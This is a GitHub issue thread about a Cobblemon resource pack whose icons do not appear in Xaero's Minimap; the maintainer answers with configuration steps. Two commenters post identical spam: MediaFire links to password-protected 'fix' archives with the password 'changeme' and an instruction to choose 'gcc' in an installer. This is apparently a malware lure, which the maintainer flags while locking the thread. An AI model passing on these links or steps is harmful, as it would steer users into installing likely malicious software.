### ISSUE TITLE
Not working

### ISSUE THREAD

**Issue by frumtheconcrete** [Emery319/E19-CobblemonMinimapIcons#8]
i applied the resource pack and put it at the top, its still not working with xaeros mini or world map. im on fabric 1.20.1

**Comment by Emery319** [comment]
The resource pack requires the "Entity Radar" feature of Xaero’s Minimap, so please make sure that Xaero’s Minimap is installed. Xaero’s World Map is optional. If all Pokémon are displayed as dots on the map, you can follow these steps to enable the display of entity icons.

> **Keep Entity Icons Visible**
> 1. Enter your world and press "Y" to open the "Minimap Settings".
> 2. Select "Entity Radar Settings".
> 3. Change "Display Icons" to "Always".
> 4. Adjust "Entity Icon Scale" to a size that‘s convenient for you.

If you need to display only the Pokémon icons, follow the steps below.

> **Display Only Pokémon Icons**
> 1. Enter .minecraft/config folder and open "xaerominimap_entities.json".
> 2.  Replace `"hardInclude": "anything"` with `"hardInclude": "nothing"`
> 3.  Replace `"includeList": []` with `"includeList": ["cobblemon:pokemon"]`

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Emery319** [comment]
Sorry, too much spam has flooded this issue, which forced me to lock it. If you still encounter problems after trying the steps I provided, please open a new issue and describe the issue you are facing in more detail. Thank you! P.S. Do not download any files from unknown sources!
